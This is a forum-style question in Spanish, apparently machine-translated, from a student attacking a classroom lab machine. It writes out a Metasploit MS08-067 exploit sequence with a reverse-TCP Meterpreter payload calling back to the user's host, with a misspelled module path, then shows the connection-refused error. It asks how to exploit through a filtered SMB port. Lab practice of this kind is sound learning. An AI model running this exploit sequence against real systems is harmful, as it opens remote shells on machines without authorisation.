Estoy haciendo algunos intentos contra una máquina que el profesor puso en el laboratorio. NMAP muestra que el puerto 445 se filtra y Nessus confirma que la vulnerabilidad ms08_067 está presente en esa máquina.
Intenté ejecutar Metasploit contra él de forma normal:
use exlpoit/windows/smb/ms08_067_netapi
set RHOST TARGET_IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
exploit
Me dice:
[-] Fallo en la explotación [inaccesible]: Rex :: ConnectionRefused The la conexión fue rechazada por el host remoto (192.168.2.2:445)
Supongo que la vulnerabilidad está fallando porque el puerto 445 está filtrado. Lo que me desconcierta es que, al parecer, Nessus puede comprobar que la vulnerabilidad está presente. Dado que Nessus puede hacer eso a través del puerto filtrado, ¿hay alguna manera de que pueda iniciar la explotación a través de un puerto filtrado? ¿Hay alguna configuración Metasploit que deba organizarse?